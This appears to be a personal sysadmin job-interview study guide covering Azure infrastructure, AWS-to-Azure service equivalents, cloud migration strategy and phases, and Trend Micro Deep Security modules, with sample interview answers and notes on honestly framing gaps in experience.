🗂️ Sysadmin Master Interview Reference

Rodolfo "Rudy" Martinez-Contreras · All Roles · Heath Consultants & Beyond
10+ yrs Enterprise IT · Disney · CMS
10 Sections · Print Anytime
🏠 Overview
☁️ Azure
☁️ AWS↔Azure & Migration
⚙️ VMware/VDI
🤖 Automation
🗂️ AD/DNS/DHCP/GPO
🖥️ SysAdmin Core
🔒 Hardening
📧 M365
📱 MDM
💾 Storage & Backups
💬 General Q&A

Your Honesty Map

Azure — Real. ~1yr gap. Review tonight. VMs, Monitor, Backup, CLI, AD Connect.
VMware / Horizon VDI — Deep. 80+ VMs, vMotion, HA, DEM, 500+ VDI sessions.
Active Directory / DNS / DHCP / GPO — Core strength. 2,000+ users, multi-site, daily use.
Automation — PowerShell / Bash — Real, quantified. 85% ops reduction.
Storage — EMC Isilon (NAS), Azure Backup, Dell CloudSnapshot Manager (AWS). Bridge to Rubrik.
Trend Micro Deep Security — Real. 100+ hybrid cloud servers at CMS. Bridges to server security, IDS/IPS, Defender for Cloud, CWPP, HIPAA compliance.
⚠️ M365 — Limited direct admin. Honest bridge: mailbox support, license management, user-level M365. Study section tonight.
⚠️ MDM (Intune/JAMF) — BigFix + Horizon DEM bridge. No direct. Be honest.
⚠️ Rubrik — No direct. Bridge via Dell CSM + Azure Backup + Isilon. Solid domain knowledge.

Resume Numbers — Know Cold

  • 10+ years enterprise IT
  • 8 years Walt Disney Company (multi-site, LA)
  • 80+ VMs VMware at Disney / 3 data centers
  • 100+ servers RHEL + Windows Server
  • 2,000+ AD users at CMS
  • 500+ concurrent Horizon VDI sessions
  • 85% manual ops reduction via scripting
  • 3 EMC Isilon NAS clusters (Disney)
  • 12 streaming TV stations — 24/7 uptime
  • B.S. IT Management — WGU
  • Security+ in progress · Azure certs next
  • Bilingual English / Spanish · Houston 77012

Hybrid Infra — Mental Model

LayerOn-PremCloud (Azure)
ComputeESXi, physical serversAzure VMs, Scale Sets
IdentityAD, Domain ControllersEntra ID, AD Connect
StorageNAS, SAN, localBlob, Files, Managed Disks
NetworkVLANs, DNS/DHCP serversVNet, NSG, Azure DNS
BackupRubrik appliance, tapeRubrik archive, Azure Backup
MgmtvCenter, RSAT, RDPAzure Portal, Monitor
💡 For every topic: think on-prem AND cloud version. That's hybrid fluency.
✅ Real experience — ~1yr gap. Read this like a refresher course. The concepts are still in your hands.

Keywords

SubscriptionResource GroupRBACAzure PortalAzure CLIAz PowerShell Azure VMsVM Scale SetsAvailability SetsAvailability ZonesManaged DisksPremium SSD VNetSubnetNSGAzure BastionVPN GatewayExpressRouteVNet PeeringPrivate Endpoint Azure AD / Entra IDAzure AD ConnectConditional AccessMFAPIMSSPR Azure MonitorLog AnalyticsAlert RulesAction GroupsVM Insights Recovery Services VaultAzure BackupASRSoft DeleteInstant Restore Blob StorageStorage AccountAzure FilesHot/Cool/ArchiveLRS/GRS/ZRS TagsCost ManagementAzure PolicyDefender for Cloud

Azure Organization & Access Control

LevelWhat it isExample
Management GroupContainer for subscriptions — enterprise governance"All Production Subs"
SubscriptionBilling unit. Separate Dev/Prod/Test subscriptions common."Heath-Production"
Resource GroupLogical container — deploy, manage, delete resources together."RG-WebServers-Prod"
ResourceActual thing: VM, NIC, disk, NSG, VNet…"VM-App01"

RBAC Built-In Roles

OwnerFull control + assign access to others
ContributorCreate/manage resources — cannot assign roles
ReaderView only — no changes
VM ContributorManage VMs — not the VNet or storage they use

Compute — VMs, Sizing, Availability

VM Series

SeriesOptimized ForUse Case
B-seriesBurstableDev/test, light workloads
D-seriesGeneral purposeMost production, web/app servers
E-seriesMemory optimizedDatabases, caching, SAP
F-seriesCompute optimizedBatch, game servers
N-seriesGPUML, rendering

Availability

OptionProtects AgainstSLA
Availability SetRack/hardware failure in one datacenter (fault + update domains)99.95%
Availability ZonesEntire datacenter outage — VMs in physically separate buildings99.99%
Single VM + Premium SSDBasic hardware redundancy99.9%

Disk Types

DiskUse CaseIOPS
Standard HDDDev/testLow
Standard SSDLight web serversMedium
Premium SSDProduction, databases — REQUIRED for SLAHigh
Ultra DiskSAP HANA, highest-performance DBsConfigurable up to millions

Networking

ComponentWhat it doesKey fact
VNetPrivate IP network in Azure. VMs live in subnets inside VNets.VMs in same VNet can talk by default
NSGStateful firewall rules — allow/deny by port, protocol, IP rangeApplied to subnet OR NIC. Subnet NSG = all VMs in subnet
Azure BastionManaged RDP/SSH from browser. No public IP on VM needed.Best practice — never open 3389 to internet
VNet PeeringConnect two VNets privately. Microsoft backbone — no internet.Not transitive — A↔B, B↔C ≠ A↔C
VPN GatewayOn-prem to Azure over encrypted tunnel (public internet)Lower cost, higher latency than ExpressRoute
ExpressRouteDedicated private circuit from on-prem to Azure. No internet.Higher cost, lower latency, more reliable
Private EndpointAzure service (Blob, SQL) accessed via private IP in your VNetTraffic never leaves Microsoft network
🔒 Never open RDP 3389 or SSH 22 to 0.0.0.0/0 in an NSG. Use Bastion or source-restrict to known IPs. Flag this proactively in any interview — it signals security maturity.

Identity — Hybrid (Azure AD Connect)

On-Prem ADAzure AD / Entra ID
ProtocolKerberos, LDAP, NTLMOAuth 2.0, SAML, OpenID Connect
StructureOUs, GPOs, Sites & ServicesFlat — uses Conditional Access + Intune for policy
AuthDomain Controller validates Kerberos ticketsCloud token-based, supports passwordless

Azure AD Connect Sync Modes

  • Password Hash Sync (PHS) — Hashed passwords synced to Azure AD. Cloud auth without hitting on-prem DC. Most common.
  • Pass-Through Auth (PTA) — Validation happens on-prem in real time. No hashes stored in cloud.
  • Force sync: Start-ADSyncSyncCycle -PolicyType Delta

Key Identity Features

Conditional AccessPolicy engine: IF (user/location/device) THEN (allow / block / require MFA). Example: "Outside corp network = force MFA."
PIMPrivileged Identity Management — just-in-time admin elevation. Request access, get approved, expires automatically. Reduces standing admin exposure.
SSPRSelf-Service Password Reset — users reset own passwords. Saves helpdesk tickets.
Managed IdentityAzure resource authenticates to other Azure services without stored credentials. Best practice for app-to-service auth.

Azure Monitor & Backup

Monitor Stack

  • Metrics — numerical time-series (CPU %, disk bytes/sec). Auto-collected. 93-day default retention.
  • Logs / Log Analytics Workspace — structured events sent here. Query with KQL. Includes activity log, diagnostic logs, VM agent logs.
  • Alert Rules — trigger on metric threshold or log query. Connected to Action Groups (email, SMS, webhook, ITSM).
  • VM Insights — pre-built VM performance dashboards, dependency mapping. Requires Azure Monitor Agent.
  • Diagnostic Settings — configure what a resource sends to Log Analytics, Storage Account, or Event Hub.

Azure Backup

  • Recovery Services Vault — container that holds backup data and policies. Region-specific.
  • Backup Policy — frequency (daily/weekly) + tiered retention (daily 30d, weekly 12wk, monthly 6mo, yearly 2yr).
  • Application-consistent — uses VSS (Windows) / pre-post scripts (Linux) to flush writes before snapshot.
  • Instant Restore — restore from recent local snapshot (fast) vs. vault restore (covers older points, slower).
  • Soft Delete — deleted backup data retained 14 extra days. Ransomware/accidental deletion protection.
  • Azure Site Recovery (ASR) — continuous VM replication to secondary region for DR failover. Different from Backup — ASR = replication, Backup = point-in-time restore.

Interview Q&A — Azure

Walk me through your Azure experience.
At CMS I provisioned and managed Azure VMs end to end — sizing, patching, lifecycle, and decommission. I configured Azure Monitor alert rules tied to action groups for CPU, memory, and disk thresholds. On backup I set up Recovery Services Vaults with tiered retention policies and ran restore drills to verify backups were actually usable. I scripted a lot via Azure CLI and PowerShell Az module — bulk VM management, patching workflows, cost reporting on deallocated resources. About a year ago so I've been refreshing the details but the hands-on instinct is there.
How do you secure Azure VM access?
Azure Bastion is the right answer — RDP/SSH from the browser, no public IP on the VM. NSGs lock down traffic at the subnet and NIC level. I treat opening RDP 3389 to 0.0.0.0/0 as a hard no in any production environment — that's how you end up on a breach report. If Bastion isn't available, the alternative is a VPN or a source-restricted jump host.
Availability Sets vs Availability Zones?
Availability Sets spread VMs across fault and update domains within a single datacenter — protects against hardware rack failures and rolling reboots during maintenance. You get 99.95% SLA. Availability Zones put VMs in physically separate buildings within the same region — protects against entire datacenter outage. 99.99% SLA. For critical production workloads in a region that supports Zones, that's the stronger choice.

AWS vs Azure — Service Name Comparison (Use Your AWS Knowledge)

You know AWS naming. Here's how everything maps so you can translate instantly in an interview.

Compute

AWSAzure EquivalentWhat it does
EC2Azure Virtual MachinesIaaS virtual servers. You manage OS up. Same concept — pick size, OS, attach storage, configure networking.
EC2 Auto Scaling GroupVM Scale Sets (VMSS)Auto-scale VMs based on load rules. Min/max/desired counts.
LambdaAzure FunctionsServerless — run code without managing servers. Event-triggered, pay per execution.
ECS / EKSAzure Container Instances / AKSRun containers. AKS = managed Kubernetes. ACI = single containers without orchestration.
Elastic BeanstalkAzure App ServicePaaS for web apps. Deploy code, platform manages runtime, scaling, patching.
AMI (Amazon Machine Image)Azure VM Image / Shared Image GalleryPre-configured OS image used to launch VMs. Azure equivalent = custom VM image captured via Sysprep + generalize.
Spot InstanceAzure Spot VMDiscounted unused capacity — can be evicted with 2min notice. Dev/test, batch jobs.
Reserved Instance (RI)Azure Reserved VM Instance1 or 3 year commitment for significant discount vs pay-as-you-go. Same VM, lower cost.

Storage

AWSAzure EquivalentWhat it does
S3Azure Blob StorageObject storage. HTTP API. Buckets → Containers. Keys → Blob names. You used S3 at CMS — same thing.
S3 Storage Classes (Standard / IA / Glacier)Blob Tiers (Hot / Cool / Archive)Tiered storage by access frequency. Glacier ≈ Archive tier — cheap, slow retrieval (hours).
EBS (Elastic Block Store)Azure Managed DisksBlock storage attached to VMs. Types map roughly: gp3 ≈ Premium SSD, io2 ≈ Ultra Disk.
EFS (Elastic File System)Azure FilesManaged NFS/SMB file share — mountable from multiple VMs simultaneously. Shared storage.
S3 GlacierAzure Blob Archive tierCheapest long-term archive. Retrieval takes hours. Both used for compliance/DR archival.
AWS BackupAzure BackupCentralized backup service for cloud resources. Policies, retention, vaults. You used Dell CSM on top of AWS — Azure Backup is native.
Storage GatewayAzure File Sync / StorSimpleHybrid — on-prem to cloud storage bridge. Cache frequently used files on-prem, tier cold data to cloud.

Networking

AWSAzure EquivalentNotes
VPCVNet (Virtual Network)Private network in the cloud. VPC = VNet. Subnets work the same way in both.
Security GroupNSG (Network Security Group)Stateful firewall rules. AWS SG applies at instance level. Azure NSG applies at subnet or NIC level.
NACL (Network ACL)NSG (subnet-level)Stateless ACL in AWS. Azure NSG is stateful but applied at subnet scope — closest equivalent.
Internet GatewayAzure Internet — built inVNet subnets with public IPs have outbound internet by default. No separate gateway resource needed like AWS IGW.
NAT GatewayAzure NAT GatewayOutbound internet for private subnets. Same concept, same name.
VPC PeeringVNet PeeringConnect two VPCs/VNets privately. Neither is transitive — A↔B, B↔C does NOT give A↔C.
Transit GatewayAzure Virtual WAN / Route ServerHub-and-spoke networking — connect many VPCs/VNets centrally. Transit Gateway is more mature in AWS currently.
Direct ConnectExpressRouteDedicated private circuit from on-prem to cloud. Not over internet. Lower latency, more reliable, more expensive.
Site-to-Site VPNVPN Gateway (Site-to-Site)IPsec VPN over public internet from on-prem to cloud. Lower cost, higher latency than Direct Connect/ExpressRoute.
Route 53Azure DNSDNS hosting. Route 53 also does health checks and traffic routing (latency-based, failover) — Azure Traffic Manager handles that separately.
ELB / ALB / NLBAzure Load Balancer / App GatewayNLB ≈ Azure Load Balancer (L4). ALB ≈ Azure Application Gateway (L7 — HTTP/HTTPS, WAF). Azure Front Door = global L7 + CDN + WAF.
CloudFrontAzure CDN / Azure Front DoorCDN — cache content globally close to users. Front Door adds routing and WAF on top.

Identity & Security

AWSAzure EquivalentNotes
IAMAzure RBAC + Entra IDAccess control. AWS IAM = users, roles, policies. Azure splits it: Entra ID for identity, RBAC for resource permissions. More granular in Azure at resource level.
IAM Role (EC2 instance role)Managed IdentityLets a VM/service authenticate to other cloud services without storing credentials in code or config.
AWS Organizations / SCPsAzure Management Groups + Azure PolicyGovern multiple accounts/subscriptions. Enforce policy at org level. SCPs ≈ Azure Policy deny effects.
AWS SSO / IAM Identity CenterEntra ID (Azure AD) + Conditional AccessSSO and access governance. Azure Conditional Access is more tightly integrated with device compliance and risk signals.
AWS Secrets ManagerAzure Key VaultStore and rotate secrets, passwords, API keys, TLS certificates. Managed Identity grants services access to Key Vault without credentials.
AWS KMSAzure Key Vault (keys)Encryption key management. Customer-managed keys for encrypting storage, disks, databases.
AWS Shield / WAFAzure DDoS Protection / Azure WAFDDoS mitigation and web application firewall. WAF in Azure runs on App Gateway or Front Door.
GuardDutyMicrosoft Defender for CloudThreat detection across cloud resources. Analyzes logs and signals for malicious activity, misconfigurations.
AWS ConfigAzure Policy + Defender for CloudCompliance posture — are your resources configured correctly? Enforces rules and reports drift.

Monitoring & Management

AWSAzure EquivalentNotes
CloudWatch MetricsAzure Monitor MetricsTime-series numeric data from resources. CPU, network, disk. Both auto-collected. Set alarms/alerts on thresholds.
CloudWatch LogsLog Analytics WorkspaceCentralized log store. CloudWatch Logs Insights (query) ≈ KQL in Log Analytics. Both aggregate logs from many sources.
CloudWatch AlarmsAzure Monitor Alert Rules + Action GroupsAlert on metric/log condition → notify (email, SMS, webhook, PagerDuty). Action Groups = SNS Topics in AWS.
CloudTrailAzure Activity LogAPI-level audit trail — who did what to which resource and when. Critical for security forensics.
AWS Systems Manager (SSM)Azure Arc + Azure AutomationManage servers (cloud and on-prem) remotely. Run scripts, patch, inventory without opening inbound ports. SSM Session Manager ≈ Azure Bastion for SSH/RDP.
AWS Cost ExplorerAzure Cost Management + BillingAnalyze spend by service, tag, time period. Set budgets and alerts. Both support reserved instance recommendations.
AWS Trusted AdvisorAzure AdvisorBest practice recommendations — cost optimization, security, reliability, performance. Flags unused resources, open security groups, etc.
CloudFormationARM Templates / BicepInfrastructure as Code. Define resources in JSON/YAML (CFN) or JSON/Bicep (ARM). Both declarative — define desired state, cloud figures out how to get there. Terraform works on both.

Database & Other Services

AWSAzure EquivalentNotes
RDSAzure SQL Database / Azure Database for MySQL/PostgreSQLManaged relational databases. RDS SQL Server ≈ Azure SQL Database. Same concept — managed engine, you handle schema/data.
DynamoDBAzure Cosmos DBManaged NoSQL. Both globally distributed, low latency, serverless options. Different data models (DynamoDB = key-value/doc, Cosmos = multi-model).
ElastiCacheAzure Cache for RedisManaged Redis or Memcached. In-memory caching for app performance.
SQSAzure Service Bus / Storage QueuesMessage queuing — decouple app components. SQS ≈ Storage Queues (simple). SNS+SQS fan-out ≈ Service Bus Topics.
SNSAzure Event Grid / Service BusPub/sub messaging. Event Grid = event routing. Service Bus = enterprise messaging with queues and topics.
💡 Key mindset shift — AWS → Azure: AWS tends to have more granular, single-purpose services. Azure tends to bundle more into fewer services (e.g., NSG handles what AWS splits between Security Groups + NACLs). Naming in Azure is more descriptive (Virtual Machine vs EC2, Virtual Network vs VPC). The concepts are identical — your AWS experience translates directly. Lead with "I know the AWS equivalent as X — in Azure that's Y."

On-Premises to Cloud Migration — Full Knowledge Base

The 6 R's of Cloud Migration (Industry Framework)

Every migration strategy falls into one of these. Know them — interviewers love this.

StrategyAlso calledWhat it meansWhen to use
Rehost"Lift and Shift"Move the VM/server as-is to the cloud. No changes to the app or OS. Fastest migration path.Legacy apps you can't modify, tight migration deadlines, first wave of a large migration
Replatform"Lift, Tinker, and Shift"Minor optimizations without changing core architecture. Example: move on-prem MySQL → Azure Database for MySQL (managed). App stays the same, engine is now managed.Get managed service benefits without full refactor. DB maintenance, patching, backups handled for you.
Refactor / Re-architect"Re-architect"Redesign the application to be cloud-native. Break monolith into microservices, adopt containers, serverless, etc. Highest value, highest effort.Apps that need to scale dynamically, modernization initiatives, long-term investment
Repurchase"Drop and Shop"Replace on-prem software with a cloud SaaS equivalent. Example: on-prem Exchange → Exchange Online (M365). On-prem CRM → Salesforce.When the SaaS alternative is better and cheaper than maintaining on-prem
RetireDecommissionIdentify apps/servers that are no longer needed. Turn them off. Saves money, reduces attack surface.During discovery — typically 10–30% of workloads can be retired
Retain"Revisit"Keep it on-prem for now. Not ready to migrate — compliance, latency, dependency, or cost doesn't justify it yet.Mainframes, apps with specialized hardware, regulatory requirements, recently upgraded systems

Migration Phases — Step by Step

PhaseStepsTools / Notes
1. Discover & Assess Inventory all servers, apps, dependencies.
Identify what talks to what (dependency mapping).
Classify by criticality and migration strategy (6 R's).
Estimate cloud costs.
AWS: Migration Evaluator, Application Discovery Service
Azure: Azure Migrate (free), Movere
Both: Cloudamize, Risc Networks, manual CMDB
2. Plan & Design Define migration waves (which workloads move together).
Design target architecture (VNet layout, subnets, NSGs).
Plan identity (AD Connect, hybrid auth).
Set up landing zone (subscriptions, networking, IAM baseline).
Establish naming conventions and tagging strategy.
Define rollback plan for each wave.
Azure Landing Zone (Microsoft CAF framework)
Azure Blueprints — deploy governance guardrails
Draw.io, Visio for architecture diagrams
3. Pilot Migration Migrate 1–3 non-critical workloads first.
Test the migration tooling end to end.
Validate networking, DNS, authentication.
Document what broke and fix the process.
Run a full cycle: migrate → test → roll back → migrate again. Build confidence before touching critical systems.
4. Migrate Execute in waves by dependency group.
For each workload: replicate → test → cut over → validate → decommission old.
Keep on-prem running in parallel until validation passes.
Update DNS after cutover.
Notify stakeholders of maintenance windows.
Azure: Azure Site Recovery (ASR) for lift-and-shift VMs
Azure Database Migration Service for databases
Storage Migration Service for file servers
AWS: AWS Server Migration Service, CloudEndure
5. Optimize & Operate Right-size VMs based on actual utilization.
Set up monitoring, alerting, backup policies.
Apply Reserved Instances for stable workloads.
Clean up — decommission on-prem hardware.
Set up FinOps — ongoing cost governance.
Azure Advisor, Cost Management, Defender for Cloud. This phase never ends — cloud optimization is continuous.

Azure Migrate — Key Tool

Azure Migrate HubFree central tool for discovery, assessment, and migration. Brings together multiple tools under one portal. Start here for any Azure migration.
Discovery & AssessmentDeploy a lightweight appliance VM on-prem. It discovers VMs, servers, SQL instances, web apps. Collects performance data for 30 days. Output: sizing recommendations and cost estimates for Azure.
Server Migration (via ASR)Replicates on-prem VMs to Azure continuously. When ready, trigger a test failover (non-disruptive), then a final cutover. Minimal downtime. Supports VMware, Hyper-V, and physical servers.
Database Migration ServiceMigrate SQL Server, MySQL, PostgreSQL to Azure managed database services. Online migration = near-zero downtime using CDC (Change Data Capture) to keep source and target in sync until cutover.

Hybrid Identity — Migration Consideration

  • Before migration: Set up Azure AD Connect to sync on-prem AD to Azure AD. Users get the same credentials for cloud resources.
  • DNS cutover is critical: When you migrate a workload, update DNS to point to the new Azure IP. Do this last — after the VM is validated in Azure. Low TTL on DNS records before migration so changes propagate fast.
  • Firewall rules: On-prem firewalls may need rules for Azure VNet subnets if hybrid connectivity exists. Plan this before migration day.
  • License mobility: Existing Windows Server and SQL Server licenses may be usable in Azure (Azure Hybrid Benefit) — significant cost savings. Always check before buying new Azure licenses.

Migration Risks & Mitigations

RiskMitigation
Undiscovered dependencies (app calls a server nobody knew about)Run dependency mapping tools for 2–4 weeks before migration. Use network flow analysis. Never skip discovery.
DNS propagation delays during cutoverLower TTL to 60 seconds 48hrs before cutover. After migration, TTL can be raised again.
Performance worse in cloud than on-premRight-size based on performance data (not just current VM size). On-prem VMs are often overprovisioned. Profile before and after.
Cost higher than estimatedUse Reserved Instances, right-size aggressively, implement auto-shutdown for dev/test, use Blob lifecycle policies.
Data not fully replicated at cutoverVerify replication lag is zero before triggering cutover. Run validation queries on both sides for databases.
Rollback needed mid-migrationKeep on-prem running until sign-off. Have a documented rollback runbook with DNS revert steps before every migration window.

Interview Q&A — Migration

Walk me through how you'd migrate an on-prem VM to Azure.
Start by assessing the workload with Azure Migrate — get sizing recommendations based on actual performance data, not just current specs. Design the target: which VNet and subnet, NSG rules, which availability option. Set up Azure AD Connect if not already done for hybrid identity. Then use Azure Site Recovery to replicate the VM — it replicates continuously to Azure while the on-prem VM is still live. When ready, trigger a test failover to validate the VM comes up clean in Azure, check app functionality, check connectivity. Then schedule the cutover window: final sync, DNS update pointing to the Azure private/public IP, validate, and notify stakeholders it's complete. Keep the on-prem VM off but not deleted for at least two weeks as a rollback option.
What are the 6 R's of cloud migration?
Rehost — lift and shift as-is, fastest. Replatform — minor optimizations like moving to a managed database service. Refactor — redesign for cloud-native, highest value, highest effort. Repurchase — replace on-prem software with SaaS equivalent, like moving Exchange to M365. Retire — decommission apps that are no longer needed, typically 10–30% of a portfolio. Retain — keep on-prem for now, not ready or not worth moving yet. In practice, most migrations are a mix — the first wave is mostly rehost for speed, then you revisit and replatform or refactor where the ROI justifies it.
What's the biggest risk in a cloud migration and how do you handle it?
Undiscovered dependencies is the one that kills migrations. An app calls a database nobody mapped, or a service relies on a hardcoded on-prem IP, and you don't find out until cutover day. The mitigation is running dependency mapping and network flow analysis for several weeks before planning the migration — tools like Azure Migrate's discovery appliance will surface most of this. The second risk is assuming rollback is easy — you always need a documented rollback runbook with DNS revert steps written before you start the cutover window, not after something goes wrong.
How do AWS and Azure differ — which is better?
Neither is universally better — they're both mature, enterprise-grade platforms. AWS has been around longer and has more services and a deeper global footprint. Azure integrates more tightly with Microsoft products — Active Directory, M365, Windows Server licensing (Hybrid Benefit), which makes it the natural choice for organizations already on the Microsoft stack. The core compute, storage, networking, and identity concepts are the same between them. My hands-on background has been primarily Azure at CMS and AWS with Dell CloudSnapshot Manager, so I'm comfortable translating between them — the underlying concepts are identical, just different naming conventions.

Migration — Plain English Refresher (ELI10 Version)

🧠 Read this first. Once the plain-English version clicks, the technical terms will stick on their own.

The Big Picture — What Is "Migrating to the Cloud"?

Imagine your company has physical servers sitting in a room — a data center or server closet. Those servers run everything: file shares, databases, websites, Active Directory. You own the hardware. You maintain it. When it breaks, you fix it.

"Migrating to the cloud" means: stop running that stuff on your hardware, and run it on Microsoft's hardware (Azure) instead. You rent compute, storage, and networking from Microsoft. Your software still runs — it just runs somewhere else, and Microsoft owns and maintains the physical machines.

That's it. Everything else is just how you move each piece, and what you decide to do with each app along the way.

The 6 R's — Plain English

When you look at each server or application, you have to decide: what actually happens to it? The industry gave these decisions names:

Rehost = "Just pick it up and move it" (Lift and Shift)
Your on-prem VM running Windows Server with an app? Create an identical VM in Azure and copy everything over. Nothing changes about the software — you just moved where it lives. Like moving furniture to a new house without changing the furniture.

Real example: Old file server → Azure VM running same Windows Server, same shares, same everything. Users don't notice except the IP changed.

Why use it: Fastest. No risk of breaking the app. Good for the first wave of a migration when you just want stuff off old hardware quickly.
Replatform = "Move it, but swap one piece for a better version"
Move to the cloud, but take the opportunity to swap one component for a managed service. The app doesn't change — just one layer underneath it.

Real example: On-prem MySQL on a VM → Azure Database for MySQL. Your app connects to it the exact same way (same connection string format), but now Microsoft handles backups, patching, and high availability for the database engine automatically. You never touch the DB server again.

Why use it: Get managed service benefits (no maintenance) without rewriting anything.
Refactor = "Rebuild it the right way for the cloud"
Redesign the application to take real advantage of cloud features — containers, serverless, auto-scaling. Highest effort, highest long-term payoff.

Real example: A big monolithic app that runs on one huge server → break it into microservices running in containers on Kubernetes. Now it scales automatically to handle 10x traffic.

Note: This is usually a developer/architect decision, not a sysadmin task — but you need to know what it means when someone says it.
Repurchase = "Throw the old thing away and buy the cloud version"
Replace the on-prem software entirely with a SaaS product that does the same job.

Real example: Running Exchange Server on-prem → move everyone to Microsoft 365 Exchange Online. Done. No more Exchange Server to maintain. Same outcome for users, zero infrastructure to manage.

Another example you know: On-prem VDI infrastructure → Azure Virtual Desktop. Same concept.
Retire = "This thing doesn't need to exist anymore"
During discovery you find servers that are running but nobody is actually using. Orphaned test servers, old apps from a project three years ago that nobody decommissioned. Just turn them off.

Real example: Windows Server 2008 VM set up for a 2019 project, still running, nobody's touched it in two years. Power it off, wait 30 days, delete it.

Why it matters: Typically 10–30% of a portfolio can be retired. That's free money and reduced attack surface.
Retain = "Leave it alone for now"
Some stuff genuinely can't move yet — compliance requirement, specialized hardware dependency, just got a major upgrade last year so moving it now wastes the investment.

Real example: A legacy mainframe processing payroll. Too risky and complex to touch. Leave it on-prem, revisit next year.

Honest note: "Retain" is also sometimes code for "we don't have budget/time for this right now." That's valid — not everything needs to move immediately.

The 5 Phases — Plain English

Phase 1 — Discover & Assess: "What do we even have?"
Before moving anything, you have to know what's there. You run a tool (Azure Migrate) that scans your network and finds every server, VM, and database. It maps what talks to what — "this web server makes calls to that database server." That dependency map is critical: if you move the web server without the database, the app breaks on migration night.

Azure Migrate also watches actual CPU and RAM usage for 30 days and says: "This VM is spec'd for 16GB RAM but only ever uses 4GB — you can run it on a smaller (cheaper) Azure VM." That's how you right-size before spending money.
Phase 2 — Plan & Design: "Set up Azure before anything moves"
Design the target environment first. What VNets and subnets? What NSG firewall rules? How does the VPN back to on-prem work? What's the naming convention? What tags go on everything for cost tracking?

Most importantly: set up Azure AD Connect now — so on-prem AD users can already authenticate to Azure resources before anything migrates. Identity has to work before apps do. No migration happens before the identity layer is confirmed working.
Phase 3 — Pilot: "Move one thing that doesn't matter, break it, learn from it"
Pick a non-critical server — a dev box, an internal test tool — something where if it breaks, nobody calls you at 2am. Migrate it completely end-to-end. See what breaks. Fix the process. Document it. Now you know what to expect before you touch production. Skipping the pilot is how you have a catastrophic migration night.
Phase 4 — Migrate: "Actually do the work, in waves"
Move workloads in groups (waves) based on dependencies — the web server and its database move together because they depend on each other.

For each workload: replicate the VM to Azure while it's still running on-prem (Azure Site Recovery does this continuously) → validate with a test failover → schedule a maintenance window → do the final sync → update DNS to the new Azure IP → cut over → verify everything works → leave old VM powered off (not deleted) for two weeks as rollback option → delete it once everyone's confident.
Phase 5 — Optimize: "Now make it not cost a fortune"
After everything's moved, look at what you're actually using. Right-size VMs that are over-provisioned. Buy Reserved Instances for things that run 24/7 (same VM, up to 60% cheaper on a 1–3 year commit). Auto-shutdown dev VMs at 6pm. Move old backups and logs to cheaper blob storage tiers (Cool or Archive). This phase never really ends — cloud cost optimization is continuous, not a one-time event.

Azure Migrate — What It Actually Does

Free tool in the Azure portal. You download a small VM appliance (OVA file) and import it into VMware or Hyper-V on-prem. It scans your environment for ~30 days, collects performance data, then uploads to Azure. You get:

  • List of every discovered VM with recommended Azure size and estimated monthly cost
  • Dependency maps — what server calls what
  • Readiness assessment — anything that would block migration
  • When ready: Azure Site Recovery handles continuous replication. Cutover = minutes of downtime, not hours.

Your Experience That Maps to All of This

You've touched migration at the operational level — own it:
Dell CloudSnapshot Manager (AWS) — managing backup policies for cloud resources = Phase 5 (protect and optimize what's in the cloud)
Azure Backup / Recovery Services Vault — same, Azure side
VMware Horizon VDI on Azure — operating a Replatform/Repurchase result. Someone migrated traditional desktop delivery to cloud-hosted VDI. You ran the resulting environment.
Azure AD / AD Connect — the identity layer that makes every migration work. You understand this cold.
Trend Micro Deep Security (CMS) — protecting 100+ hybrid cloud servers. This is the security layer that runs in parallel with migration — making sure servers are protected as they move to cloud. Cloud workload protection.

Honest interview framing: "I've operated in hybrid cloud environments that were the result of migration work — managed the identity layer, cloud backup/recovery, and server security across hybrid infrastructure. I understand the framework and the operational side deeply. I haven't led a greenfield lift-and-shift project, but I understand every phase of how it works."

Trend Micro Deep Security — Your Experience & What It Bridges

✅ Real experience at CMS — 100+ hybrid cloud servers. This is a significant security credential many sysadmins don't have.

What Trend Micro Deep Security Is

Trend Micro Deep Security is an enterprise cloud workload protection platform (CWPP) — a security agent installed on servers (Windows and Linux) that protects them from threats at the OS and network level. It runs on physical servers, VMs, and cloud instances (AWS EC2, Azure VMs).

Think of it as the security layer inside the server — complementing the network firewall (which sits outside). It watches what's happening on the host itself.

What Deep Security Does — Module by Module

ModuleWhat it doesPlain English
Anti-MalwareReal-time malware scanning of files and processes. Signature + behavioral detection.Antivirus for servers — catches malware before it runs or as it runs.
IDS/IPS (Intrusion Detection/Prevention)Inspects network traffic going in/out of the host. Detects and blocks known attack patterns.Watches network traffic at the server level. Blocks exploit attempts even if the OS patch isn't applied yet (virtual patching).
Integrity MonitoringWatches files, directories, registry keys for unauthorized changes. Alerts when something unexpected is modified."Someone changed a config file or system binary that shouldn't have changed." Detects tampering.
Log InspectionCollects and filters OS and app logs. Forwards security-relevant events to SIEM. Reduces noise.Reads logs and surfaces the ones that matter for security — failed logons, privilege escalation, service changes.
FirewallHost-based firewall on the server. Controls inbound/outbound traffic by rule at the OS level.Extra firewall layer inside the server itself, independent of the network firewall.
Application ControlWhitelist what software is allowed to run on the server. Block everything else."Only our approved apps run here." Stops unauthorized software and ransomware from executing.
Virtual PatchingIPS rules that block exploitation of known vulnerabilities — even before the OS/app patch is applied.Buys you time between when a CVE drops and when you can patch. The IPS rule blocks the exploit in transit.

Deep Security Manager vs Agent

Deep Security Manager (DSM)Centralized management console — web UI where you manage policies, review alerts, assign protection modules to servers, and view dashboards. You administered this at CMS.
Deep Security Agent (DSA)Lightweight agent installed inside each protected server. Enforces the policy assigned from DSM. Communicates back to DSM for reporting and policy updates.
Deep Security Virtual Appliance (DSVA)For VMware environments — runs at the hypervisor level via VMware vShield/NSX. Protects VMs without an agent inside each VM. Agentless protection.
PoliciesYou create policies in DSM that define which modules are active and how they're configured. Assign a policy to a server or group of servers. Changes propagate automatically to all assigned agents.

What It Bridges In an Interview

They ask about...Your Trend Micro bridgeAzure/Modern equivalent
Endpoint/server security"At CMS I managed Trend Micro Deep Security protecting 100+ hybrid cloud servers — anti-malware, IDS/IPS, integrity monitoring, and log inspection across Windows and Linux."Microsoft Defender for Servers / Defender for Endpoint
IDS/IPS"Deep Security's IPS module — virtual patching protected servers against known CVEs while we worked through the patch cycle."Azure Firewall Premium (IDPS), NSG Flow Logs, Defender for Cloud
Security monitoring / SIEM"Deep Security's log inspection module collected and forwarded security events from 100+ servers — failed logons, file integrity alerts, privilege escalation — reducing noise before it reached the SIEM."Azure Monitor / Log Analytics / Microsoft Sentinel
Compliance / hardening"Deep Security's integrity monitoring gave us evidence that system files and configs hadn't been tampered with — important for HIPAA compliance on the CMS contract."Defender for Cloud compliance reports, Azure Policy
